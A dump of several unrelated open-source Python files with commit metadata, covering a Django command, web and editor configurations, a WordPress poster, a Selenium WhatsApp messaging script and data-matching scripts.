# Copyright (c) 2017 Rene Jean Corneille
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from trendpy.strategies import *
class StrategyFactory:
    """Registry/factory for strategy objects, keyed by strategy class name."""

    # Maps a strategy id (class name) to a factory able to build instances.
    factories = {}

    @staticmethod
    def add(id, factory):
        """Register *factory* under *id*.

        Bug fix: the original wrote ``StrategyFactory.factories.put[id]``
        (a Java-ism) which raises AttributeError; dicts are assigned with
        plain subscript syntax.
        """
        StrategyFactory.factories[id] = factory

    @staticmethod
    def create(id, *args, **kwargs):
        """Build a strategy instance for *id*, lazily registering its factory.

        On first use, resolves '<id>.Factory()' by name.
        NOTE(review): eval on *id* is unsafe if the id can come from
        untrusted input -- confirm callers only pass known class names.
        """
        if not id in StrategyFactory.factories:
            StrategyFactory.factories[id] = eval('%s.Factory()' % id)
        return StrategyFactory.factories[id].create(*args, **kwargs)
|
mit
|
Python
|
|
df7cf8ef2bdba9f50e21f4a7fc96904122fde311
|
Add gunicorn config file
|
mehdisadeghi/sqmpy,simphony/sqmpy,mehdisadeghi/sqmpy,mehdisadeghi/sqmpy,simphony/sqmpy,simphony/sqmpy
|
gunicorn_cfg.py
|
gunicorn_cfg.py
|
"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:3000'
# The only tested worker class is gevent
worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application loglevel
loglevel = 'debug'
|
bsd-3-clause
|
Python
|
|
cb875f2043a1c3a9ec5201336d1b577655612279
|
move utility methods into their own module as functions, clean up type lookup
|
darthlukan/bottly,shaggytwodope/bottly
|
utils.py
|
utils.py
|
def bytes_to_unicode(data):
    """Decode a UTF-8 byte string into text."""
    return str(data, "UTF-8")
def unicode_to_bytes(data):
    """Encode text into a UTF-8 byte string."""
    return bytes(data, "UTF-8")
def pretty_print(self, user, msg_type, destination, message):
    """Print an IRC-style line: 'user msg_type destination :message'.

    If *message* is a list, its items are joined with spaces first.
    """
    # NOTE(review): this function was moved out of a class to module scope
    # (per the commit intent) but still takes an unused 'self' parameter --
    # confirm callers and drop it.
    if isinstance(message, list):
        message = " ".join(message)
    print("%s %s %s :%s" % (user, msg_type, destination, message))
|
mit
|
Python
|
|
568fe1ff8c4ef27f93751f53a27707f045f19037
|
update core api module
|
simphony/simphony-paraview,simphony/simphony-paraview
|
simphony_paraview/core/api.py
|
simphony_paraview/core/api.py
|
from .iterators import iter_cells, iter_grid_cells
from .cuba_data_accumulator import CUBADataAccumulator
from .cuba_utils import (
supported_cuba, cuba_value_types, default_cuba_value, VALUETYPES)
from .constants import points2edge, points2face, points2cell, dataset2writer
from .paraview_utils import (
write_to_file, loaded_in_paraview, typical_distance, set_data)
from .cuds2vtk import cuds2vtk
__all__ = [
'iter_cells',
'iter_grid_cells',
'CUBADataAccumulator',
'supported_cuba',
'default_cuba_value',
'cuba_value_types',
'VALUETYPES',
'points2edge',
'points2face',
'points2cell',
'dataset2writer',
'write_to_file',
'loaded_in_paraview',
'cuds2vtk',
'typical_distance',
'set_data']
|
from .iterators import iter_cells, iter_grid_cells
from .cuba_data_accumulator import CUBADataAccumulator
from .cuba_utils import (
supported_cuba, cuba_value_types, default_cuba_value, VALUETYPES)
from .constants import points2edge, points2face, points2cell, dataset2writer
from .paraview_utils import write_to_file, loaded_in_paraview
from .cuds2vtk import cuds2vtk
__all__ = [
'iter_cells',
'iter_grid_cells',
'CUBADataAccumulator',
'supported_cuba',
'default_cuba_value',
'cuba_value_types',
'VALUETYPES',
'points2edge',
'points2face',
'points2cell',
'dataset2writer',
'write_to_file',
'loaded_in_paraview',
'cuds2vtk']
|
bsd-2-clause
|
Python
|
f418e9e68d1f2a7f6a0ad5060a1ed5a7ed74664f
|
Add YCM configuration
|
aostrowski/dotfiles
|
_vim/ycm_global_extra_conf.py
|
_vim/ycm_global_extra_conf.py
|
# Copied from https://gist.github.com/micbou/f8ed3f8bd6bd24e9f89bef286437306b. Kudos to micbou
import os
import ycm_core
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def IsHeaderFile(filename):
    """Return True when *filename* has a C/C++ header extension."""
    _, ext = os.path.splitext(filename)
    return ext in ('.h', '.hxx', '.hpp', '.hh')
def GetCompilationInfoForFile( database, filename ):
    """Look up compile flags for *filename* in a compilation database.

    Returns a ycm_core CompilationInfo, or None when *filename* is a header
    with no sibling source file in the database.
    """
    # The compilation_commands.json file generated by CMake does not have entries
    # for header files. So we do our best by asking the db for flags for a
    # corresponding source file, if any. If one exists, the flags for that file
    # should be good enough.
    if IsHeaderFile( filename ):
        basename = os.path.splitext( filename )[ 0 ]
        for extension in SOURCE_EXTENSIONS:
            replacement_file = basename + extension
            if os.path.exists( replacement_file ):
                compilation_info = database.GetCompilationInfoForFile(
                    replacement_file )
                if compilation_info.compiler_flags_:
                    return compilation_info
        return None
    return database.GetCompilationInfoForFile( filename )
def PathsToAllParentFolders(path):
    """Yield *path* (if it is a directory), then every ancestor up to the root."""
    current = os.path.normpath(path)
    if os.path.isdir(current):
        yield current
    parent = os.path.dirname(current)
    # dirname() reaches a fixpoint at the filesystem root.
    while parent != current:
        yield parent
        current, parent = parent, os.path.dirname(parent)
def FindCompilationDatabase( filename, compilation_database_folder):
    """Locate the folder holding compile_commands.json for *filename*.

    If *compilation_database_folder* exists as-is (absolute or relative to
    the CWD), it is returned directly; otherwise each ancestor of *filename*
    is probed for '<ancestor>/<folder>/compile_commands.json'.  Returns the
    containing directory, or None when nothing is found.
    """
    if os.path.exists(os.path.abspath( compilation_database_folder )):
        return compilation_database_folder
    for folder in PathsToAllParentFolders( filename ):
        compile_commands = os.path.join( folder, compilation_database_folder,
                                         'compile_commands.json' )
        if os.path.exists( compile_commands ):
            return os.path.dirname( compile_commands )
    return None
def FlagsForFile( filename, **kwargs ):
    """YouCompleteMe entry point: return compile flags for *filename*.

    Reads the database folder from the vim variable
    'g:ycm_compilation_database_folder' (passed via client_data) and
    returns an empty dict -- i.e. no flags -- whenever any lookup step fails.
    """
    compilation_database_folder = kwargs[ 'client_data' ].get(
        'g:ycm_compilation_database_folder' )
    if not compilation_database_folder:
        return {}
    compilation_database_folder = FindCompilationDatabase(
        filename, compilation_database_folder )
    if not compilation_database_folder:
        return {}
    database = ycm_core.CompilationDatabase( compilation_database_folder )
    if not database.DatabaseSuccessfullyLoaded():
        return {}
    compilation_info = GetCompilationInfoForFile( database, filename )
    if not compilation_info:
        return {}
    return {
        'flags': compilation_info.compiler_flags_,
        'include_paths_relative_to_dir': compilation_info.compiler_working_dir_
    }
|
mit
|
Python
|
|
be4374fd50d0c1148e3a734cc53391e15d4bbdc4
|
Create wksp5.py
|
indigohedgehog/RxWorkshopPy
|
wksp5.py
|
wksp5.py
|
"""Rx Workshop: Event Processing.
Part 2 - Grouping.
Usage:
python wksp5.py
"""
from __future__ import print_function
import rx
class Program:
    """Rx grouping demo: groups stdin lines by their length."""

    @staticmethod
    def main():
        # Feed stdin lines into an observable scheduled on a new thread.
        src = rx.Observable.from_iterable(get_input(),
                                          rx.concurrency.Scheduler.new_thread)
        res = src.group_by(lambda s: len(s)).to_blocking()

        def on_group(g):
            # Bug fixes vs. the original single lambda:
            #  * 'print(...) and g.subscribe(...)' never subscribed, because
            #    print() returns None and 'and' short-circuits;
            #  * 'g.key' (an int group key) was concatenated to a str,
            #    raising TypeError on the first member.
            print("New group with length = " + str(g.key))
            g.subscribe(lambda x: print(" " + str(x) + " member of " + str(g.key)))

        res.for_each(on_group)
def get_input():
    """Yield lines read from stdin forever (Python 2: raw_input)."""
    while True:
        yield raw_input()
if __name__ == '__main__':
Program.main()
|
mit
|
Python
|
|
e789579c77d2d96d098f4b46f1dfec4d54c843e5
|
move AbstractProductCategory and AbstractNestedProductCategory
|
byteweaver/django-eca-catalogue
|
eca_catalogue/categorization/abstract_models.py
|
eca_catalogue/categorization/abstract_models.py
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from treebeard.mp_tree import MP_Node
class AbstractProductCategory(models.Model):
    """Abstract base for a flat product category: unique name + description."""

    name = models.CharField(_("Name"), max_length=128, unique=True)
    description = models.TextField(_("Description"), blank=True, null=True)

    class Meta:
        abstract = True
        verbose_name = _("Product category")
        verbose_name_plural = _("Product categories")
        ordering = ['name']

    def __unicode__(self):
        return self.name
class AbstractNestedProductCategory(AbstractProductCategory, MP_Node):
    """Tree-structured variant (treebeard materialized-path) of the category."""

    class Meta:
        abstract = True

    def __unicode__(self):
        # Render the full ancestry path, e.g. 'Parent -> Child'.
        if not self.is_root():
            return unicode(self.get_parent()) + " -> " + self.name
        return self.name
|
bsd-3-clause
|
Python
|
|
000239e4f838f6514f6e902510d70fdc41b196d5
|
Add wordpress_post
|
JulienLeonard/socialpost
|
wordpress_post.py
|
wordpress_post.py
|
import os
import time
from base64 import b64encode
import json
import requests
from wordpresspushmedia import *
#
# publish the image as a media in wordpress, and return the HTML to include into the post
#
def wordpress_publish_image(blogid,title,imageurl,bearer_key):
    """Upload *imageurl* to the WordPress.com media library of *blogid*.

    Returns an <img> HTML tag for embedding in a post, preferring the
    'large' rendition when WordPress generated one, otherwise full size.
    """
    url = "https://public-api.wordpress.com/rest/v1/sites/" + blogid + "/media/new"
    headers = {"Authorization": "bearer " + bearer_key }
    postdata = { 'media_urls' : [imageurl] }
    response = requests.post(url, data=json.dumps(postdata), headers=headers)
    jresponse = response.json()
    media = jresponse['media'][0];
    general_link = media['link'];
    # Directory part of the media URL; size renditions live beside the original.
    linkdir = "/".join(general_link.split("/")[:-1])
    metadata = media['metadata'];
    if 'large' in metadata['sizes']:
        filebig = metadata['sizes']['large']['file'];
        src = linkdir + "/" + filebig;
        width = metadata['sizes']['large']['width'];
        height = metadata['sizes']['large']['height'];
        sizetype = "size-large";
    else:
        # No 'large' rendition: fall back to the full-size upload.
        src = media['link'];
        width = metadata['width'];
        height = metadata['height'];
        sizetype = "size-full";
    WPID = media['id']
    SRC = src;
    TITLE = title;
    WIDTH = str(width);
    HEIGHT = str(height);
    ID = str(WPID);
    HTML = "<img src=\"" + SRC + "\" alt=\"" + TITLE + "\" width=\"" + WIDTH + "\" height=\"" + HEIGHT + "\" class=\"alignnone " + sizetype + " wp-image-" + ID + "\" />"
    return HTML
#
# post a wordpress post with image
#
def wordpress_post(status,description,title,categories,tags,imageurl,wordpress_blogid,wordpress_bearer_key):
    """Publish *imageurl* as a media item, then create a post embedding it.

    Returns the JSON-decoded API response on success, or "" on any failure.
    (Python 2 module: note the print statement below.)
    """
    # Upload the image first so its <img> tag can lead the post body.
    html = wordpress_publish_image(wordpress_blogid,title,imageurl, wordpress_bearer_key)
    content = html + "\n" + description
    headers = {"Authorization": "bearer " + wordpress_bearer_key }
    data = { 'content': content, "status":status, "title":title, "categories":categories, "tags":tags }
    try:
        response = requests.post("https://public-api.wordpress.com/rest/v1/sites/" + wordpress_blogid + "/posts/new", data=data, headers=headers)
        result = response.json()
    except:
        # NOTE(review): bare except swallows the real error; consider catching
        # requests.RequestException / ValueError and logging the exception.
        print "wordpress post catch exception"
        result = ""
    return result
|
mit
|
Python
|
|
2fdbd208ee6db593df6f8b7c171a716ea3716920
|
Add a checks module
|
stackforge/doc8,openstack/doc8,tschuy/doc8,doismellburning/doc8
|
doc8/checks.py
|
doc8/checks.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Ivan Melnikov <iv at altlinux dot org>
#
# Author: Joshua Harlow <harlowja@yahoo-inc.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import re
import six
@six.add_metaclass(abc.ABCMeta)
class ContentCheck(object):
@abc.abstractmethod
def report_iter(self, parsed_file):
pass
@six.add_metaclass(abc.ABCMeta)
class LineCheck(object):
@abc.abstractmethod
def report_iter(self, line):
pass
class CheckTrailingWhitespace(LineCheck):
    """Flags lines that end with whitespace (report D002)."""

    # Fix: raw string -- '\s' in a non-raw literal is an invalid escape
    # sequence (DeprecationWarning, later SyntaxWarning, in Python 3).
    _TRAILING_WHITESPACE_REGEX = re.compile(r'\s$')
    REPORTS = frozenset(["D002"])

    def report_iter(self, line):
        """Yield a (code, message) pair when *line* has trailing whitespace."""
        if self._TRAILING_WHITESPACE_REGEX.search(line):
            yield ('D002', 'Trailing whitespace')
class CheckIndentationNoTab(LineCheck):
    """Flags lines whose leading whitespace contains a tab (report D003)."""

    # Fix: raw string -- '\s' in a non-raw literal is an invalid escape
    # sequence (DeprecationWarning, later SyntaxWarning, in Python 3).
    _STARTING_WHITESPACE_REGEX = re.compile(r'^(\s+)')
    REPORTS = frozenset(["D003"])

    def report_iter(self, line):
        """Yield a (code, message) pair when indentation uses a tab."""
        match = self._STARTING_WHITESPACE_REGEX.search(line)
        if match:
            spaces = match.group(1)
            if '\t' in spaces:
                yield ('D003', 'Tabulation used for indentation')
class CheckCarriageReturn(LineCheck):
    """Flags lines containing a literal carriage return (report D004)."""

    REPORTS = frozenset(["D004"])

    def report_iter(self, line):
        """Yield a (code, message) pair when *line* embeds a CR character."""
        if line.find("\r") != -1:
            yield ('D004', 'Found literal carriage return')
|
apache-2.0
|
Python
|
|
44ef28ee6272c1b65b64ec2f1d54d8fbc592664c
|
Add script to match instrument IDs to MIMO and Wikidata
|
CarnegieHall/linked-data
|
scripts/match_mimoInstruments.py
|
scripts/match_mimoInstruments.py
|
# !/usr/local/bin/python3.4.2
# ----Copyright (c) 2017 Carnegie Hall | The MIT License (MIT)----
# ----For the full license terms, please visit https://github.com/CarnegieHall/linked-data/blob/master/LICENSE----
## Argument[0] is script to run
## Argument[1] is path to csv of Wikidata query results w/MIMO and MBZ IDs
## Argument[2] is path to csv file of CH instrument IDs, labels, MBZ links
## from CH-LOD
import csv
import json
import os
import sys
##from fuzzywuzzy import fuzz
##from fuzzywuzzy import process
from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import FOAF, RDF, RDFS, SKOS, XSD
from rdflib.plugins.serializers.nt import NTSerializer
# argv[1]: csv of Wikidata query results (Wikidata ID, label, MBZ ID, MIMO ID)
# argv[2]: csv of CH instrument IDs, labels and MusicBrainz links
filePath_1 = sys.argv[1]
filePath_2 = sys.argv[2]

wikidataInstr_dict = {}
chInstr_dict = {}  # NOTE(review): never populated or read below -- dead?
ch_toMIMO_Dict = {}
g = Graph()

##def fuzzy_match(x, choices, scorer, cutoff):
##    return process.extractOne(
##        x, choices=choices, scorer=scorer, score_cutoff=cutoff
##    )

# Index the Wikidata rows by MusicBrainz ID so the CH rows can be joined on it.
# NOTE(review): mode 'rU' is deprecated in Python 3 -- confirm target version.
with open(filePath_1, 'rU') as f1:
    wikidataInstr = csv.reader(f1, dialect='excel', delimiter=',', quotechar='"')
    next(wikidataInstr, None)  # skip the header row
    for row in wikidataInstr:
        wikidataID = row[0]
        wikidataLabel = row[1]
        mbzID = row[2]
        mimoID = row[3]
        wikidataInstr_dict[str(mbzID)] = {}
        wikidataInstr_dict[str(mbzID)]['label'] = wikidataLabel
        wikidataInstr_dict[str(mbzID)]['wikidataID'] = wikidataID
        wikidataInstr_dict[str(mbzID)]['mimo'] = mimoID

# Join CH instruments to the Wikidata index on the shared MusicBrainz ID and
# record skos:exactMatch triples for each hit.
with open(filePath_2, 'rU') as f2:
    chInstruments = csv.reader(f2, dialect='excel', delimiter=',', quotechar='"')
    next(chInstruments, None)  # skip the header row
    for row in chInstruments:
        chID = row[0]
        chLabel = row[1]
        mbzID = row[2]
        if mbzID in wikidataInstr_dict.keys():
            wikidataLabel = wikidataInstr_dict[str(mbzID)]['label']
            wikidataID = wikidataInstr_dict[str(mbzID)]['wikidataID']
            mimoID = wikidataInstr_dict[str(mbzID)]['mimo']
            ch_toMIMO_Dict[str(chID)] = {}
            ch_toMIMO_Dict[str(chID)]['chLabel'] = chLabel
            ch_toMIMO_Dict[str(chID)]['wikidataLabel'] = wikidataLabel
            ch_toMIMO_Dict[str(chID)]['wikidataID'] = wikidataID
            ch_toMIMO_Dict[str(chID)]['mimoID'] = mimoID
            g.add( (URIRef(chID), SKOS.exactMatch, URIRef(mimoID)) )
            g.add( (URIRef(chID), SKOS.exactMatch, URIRef(wikidataID)) )

# Output locations, relative to this script's parent directory.
ch_toMIMO_Dict_path = os.path.join(
    os.path.dirname(__file__), os.pardir, 'JSON_dicts', 'ch_toMIMO_Dict.json')
ch_toMIMO_Graph_path = os.path.join(
    os.path.dirname(__file__), os.pardir, 'graphs', 'ch_toMIMO_Graph.nt')

# Serialize the match graph as N-Triples and the join table as JSON.
g.bind("skos", SKOS)
g = g.serialize(destination=ch_toMIMO_Graph_path, format='nt')
with open(ch_toMIMO_Dict_path, 'w') as f1:
    json.dump(ch_toMIMO_Dict, f1)

print(json.dumps(ch_toMIMO_Dict, indent=4))
print("Finished finding matches to MIMO instrument IDs")
|
mit
|
Python
|
|
000a952d38badc8ee245f26e13a5fb38838e68ec
|
Add datamigration for django-parler-1.0git
|
ixc/django-fluent-contents,jpotterm/django-fluent-contents,pombredanne/django-fluent-contents,edoburu/django-fluent-contents,edoburu/django-fluent-contents,django-fluent/django-fluent-contents,pombredanne/django-fluent-contents,ixc/django-fluent-contents,jpotterm/django-fluent-contents,jpotterm/django-fluent-contents,edoburu/django-fluent-contents,django-fluent/django-fluent-contents,django-fluent/django-fluent-contents,pombredanne/django-fluent-contents,ixc/django-fluent-contents
|
fluent_contents/plugins/sharedcontent/migrations/0005_upgrade_to_django_parler10.py
|
fluent_contents/plugins/sharedcontent/migrations/0005_upgrade_to_django_parler10.py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """No-op South migration for the django-parler 1.0 upgrade.

    Only the frozen model definitions below changed (an auto-generated
    model name was renamed); the database tables are already correct,
    so both directions are intentionally empty.
    """

    def forwards(self, orm):
        # The automatically generated model name was changed, table layout remains the same.
        # This migration only updates the frozen model definitions.
        pass

    def backwards(self, orm):
        # Nothing to undo -- forwards() made no schema changes.
        pass

    # South's frozen ORM snapshot; generated, do not edit by hand.
    models = {
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'fluent_contents.contentitem': {
            'Meta': {'ordering': "('placeholder', 'sort_order')", 'object_name': 'ContentItem'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language_code': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '15', 'db_index': 'True'}),
            'parent_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'parent_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'contentitems'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['fluent_contents.Placeholder']"}),
            'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_fluent_contents.contentitem_set'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
            'sort_order': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
        },
        'fluent_contents.placeholder': {
            'Meta': {'unique_together': "(('parent_type', 'parent_id', 'slot'),)", 'object_name': 'Placeholder'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'parent_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'parent_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
            'role': ('django.db.models.fields.CharField', [], {'default': "'m'", 'max_length': '1'}),
            'slot': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
        },
        u'sharedcontent.sharedcontent': {
            'Meta': {'object_name': 'SharedContent'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
        },
        u'sharedcontent.sharedcontentitem': {
            'Meta': {'ordering': "('placeholder', 'sort_order')", 'object_name': 'SharedContentItem', 'db_table': "u'contentitem_sharedcontent_sharedcontentitem'", '_ormbases': ['fluent_contents.ContentItem']},
            u'contentitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fluent_contents.ContentItem']", 'unique': 'True', 'primary_key': 'True'}),
            'shared_content': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shared_content_items'", 'to': u"orm['sharedcontent.SharedContent']"})
        },
        u'sharedcontent.sharedcontenttranslation': {
            'Meta': {'unique_together': "[('language_code', 'master')]", 'object_name': 'SharedContentTranslation', 'db_table': "u'sharedcontent_sharedcontent_translation'"},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language_code': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
            'master': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'translations'", 'null': 'True', 'to': u"orm['sharedcontent.SharedContent']"}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        }
    }

    complete_apps = ['sharedcontent']
|
apache-2.0
|
Python
|
|
dbcaa9f2cda37269cd5dfca1166394f71bb3adfc
|
Create Example5.py
|
cpgoncalves/gameplayer
|
Example5.py
|
Example5.py
|
# Carlos Pedro Gonçalves (2015), Game Theory with Python
# Game Theory and Applied A.I. Classes
# Instituto Superior de Ciências Sociais e Políticas (ISCSP)
# University of Lisbon
# cgoncalves@iscsp.ulisboa.pt
#
# New Entrant vs Market Leader (payoffs correspond to strategic value)
#
# For more details see the user manual that comes with the package:
# Gonçalves, C.P. (2015) "Game Player User Manual - A Game Theory Analyzer With Python",
# https://sites.google.com/site/autonomouscomputingsystems/game-player
import gamep # import the game player main module
tree = []  # setup the game tree

# design the tree in accordance with the problem:
# the "No move" is added at a given level whenever the player has no alternative choice
# this allows us to deal with a tree with different branch lengths
# (each path ends in a [new-entrant payoff, market-leader payoff] pair)
gamep.createPath(["Enter","Propose partnership","Accept partnership","No move"], [5,3],tree)
gamep.createPath(["Enter","Propose partnership","Reject partnership","Fight"], [-2,3.5],tree)
gamep.createPath(["Enter","Propose partnership","Reject partnership","Do not fight"], [4,2],tree)
gamep.createPath(["Enter","Do not propose partnership","Fight","No move"], [-1,3],tree)
gamep.createPath(["Enter","Do not propose partnership","Do not fight","No move"], [4,2],tree)
gamep.createPath(["Do not enter","No move","No move","No move"],[0,5],tree)

gamep.showTree(tree)

# play sequence: New Entrant plays in the first two levels then the Market Leader
# plays in the next two levels (0 = first player, 1 = second player per level)
plays = [0,0,1,1]

gamep.evaluateTree(tree,plays)  # evaluate the game tree
|
mit
|
Python
|
|
f0e1fc1751b20019e87cc50085c1350806b02f9f
|
Add missing visualizer module
|
explosion/thinc,explosion/thinc,spacy-io/thinc,spacy-io/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc
|
thinc/extra/visualizer.py
|
thinc/extra/visualizer.py
|
''' A visualizer module for Thinc '''
import seaborn
import matplotlib.pyplot as plt
def visualize_attention(x, y, weights, layer='Encoder', self_attn=True):
    '''
    Visualize self/outer attention
    Args:
        x: sentence (labels for the heatmap rows)
        y: sentence (labels for the heatmap columns)
        weights: (nH, nL, nL) attention weights, one slice per head
        layer: layer name shown in the figure title
        self_attn: True for self attention, False for outer attention
    '''
    # At most four heads are displayed side by side.
    n_heads = min(weights.shape[0], 4)
    figure, axes = plt.subplots(1, n_heads)

    attn_kind = 'self attention' if self_attn else 'outer attention'
    figure.suptitle('{} {} for all the heads'.format(layer, attn_kind))

    if len(weights.shape) != 3:
        raise ValueError("Wrong input weights dimensions")

    for head in range(n_heads):
        seaborn.heatmap(weights[head], square=True, xticklabels=y,
                        yticklabels=x, vmin=0.0, vmax=1.0,
                        cbar_kws=dict(use_gridspec=False, location="top"),
                        ax=axes[head])
    plt.show()
|
mit
|
Python
|
|
0a23dddae52c861ef8f359affc71c082e970c9a5
|
Create WhatsApp.py
|
Ganeshrockz/WhatsApp
|
WhatsApp.py
|
WhatsApp.py
|
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
import time
# Replace below path with the absolute path
# to chromedriver in your computer
driver = webdriver.Chrome('/home/saket/Downloads/chromedriver')
driver.get("https://web.whatsapp.com/")
wait = WebDriverWait(driver, 600)

# Replace 'Friend's Name' with the name of your friend
# or the name of a group
target = '"Friend\'s Name"'

# Replace the below string with your own message
message = "Message sent using Python!!!"

# Locate the chat by its title and open it.
group_xpath = '//span[contains(@title,' + target + ')]'
group = wait.until(EC.presence_of_element_located((
    By.XPATH, group_xpath)))
group.click()

# BUG FIX: the xpath variable was defined as `inp` but referenced as
# `inp_xpath`, raising NameError before any message could be sent.
# Also renamed `input` so the builtin is not shadowed.
inp_xpath = '//div[@class="input"][@dir="auto"][@data-tab="1"]'
message_box = wait.until(EC.presence_of_element_located((
    By.XPATH, inp_xpath)))

# Send the message 100 times, one second apart.
for _ in range(100):
    message_box.send_keys(message + Keys.ENTER)
    time.sleep(1)
|
mit
|
Python
|
|
927c9bcb0beab4f8fd6c2003573316906ad9dee3
|
add init file
|
wanghuafeng/spider_tools,wanghuafeng/spider_tools
|
__init__.py
|
__init__.py
|
#!-*- coding:utf-8 -*-
|
mit
|
Python
|
|
1ab69075e39ad52674ffa52b86f64839f24d9016
|
Update merge person tool
|
barberscore/barberscore-api,barberscore/barberscore-api,dbinetti/barberscore-django,dbinetti/barberscore,barberscore/barberscore-api,dbinetti/barberscore-django,dbinetti/barberscore,barberscore/barberscore-api
|
project/apps/api/management/commands/merge_persons.py
|
project/apps/api/management/commands/merge_persons.py
|
from optparse import make_option
from django.core.management.base import (
BaseCommand,
CommandError,
)
from apps.api.models import (
Person,
Singer,
Director,
Arranger,
)
class Command(BaseCommand):
    """Merge one Person into another, re-pointing related records.

    Usage: ``merge_persons --old="Old Name" --new="New Name"``.
    Every Director, Singer and Arranger row attached to the old person
    is recreated against the new person, then the old person is deleted.
    """

    help = "Merge selected singers by name"

    option_list = BaseCommand.option_list + (
        make_option(
            "-o",
            "--old",
            dest="old",
            help="specify old name",
        ),
        make_option(
            "-n",
            "--new",
            dest="new",
            help="specify new name",
        ),
    )

    def handle(self, *args, **options):
        # Both names are mandatory.
        if options['old'] is None:
            raise CommandError("Option `--old=...` must be specified.")
        if options['new'] is None:
            raise CommandError("Option `--new=...` must be specified.")

        # Make sure both persons exist (case-insensitive name lookup).
        try:
            new_person = Person.objects.get(
                name__iexact=options['new'],
            )
        except Person.DoesNotExist:
            raise CommandError("New person does not exist.")
        try:
            old_person = Person.objects.get(
                name__iexact=options['old'],
            )
        # BUG FIX: the lookup is on Person, so a miss raises
        # Person.DoesNotExist; catching Singer.DoesNotExist let the
        # exception escape as an unhandled traceback.
        except Person.DoesNotExist:
            raise CommandError("Old person does not exist.")

        # Move related records onto the new person.
        for director in old_person.choruses.all():
            Director.objects.create(
                person=new_person,
                contestant=director.contestant,
                part=director.part,
            )
        for singer in old_person.quartets.all():
            Singer.objects.create(
                person=new_person,
                contestant=singer.contestant,
                part=singer.part,
            )
        for arranger in old_person.arrangements.all():
            Arranger.objects.create(
                person=new_person,
                chart=arranger.chart,
                part=arranger.part,
            )

        # Remove the now-redundant person.
        try:
            old_person.delete()
        except Exception as e:
            raise CommandError("Error deleting old person: {0}".format(e))
        return "Merged {0} into {1}".format(old_person, new_person)
|
bsd-2-clause
|
Python
|
|
fee0bf6ab2fdeab8e81ca3f0381cdcc76454ee28
|
Add openai environment viewer
|
jakejhansen/minesweeper_solver,jakejhansen/minesweeper_solver
|
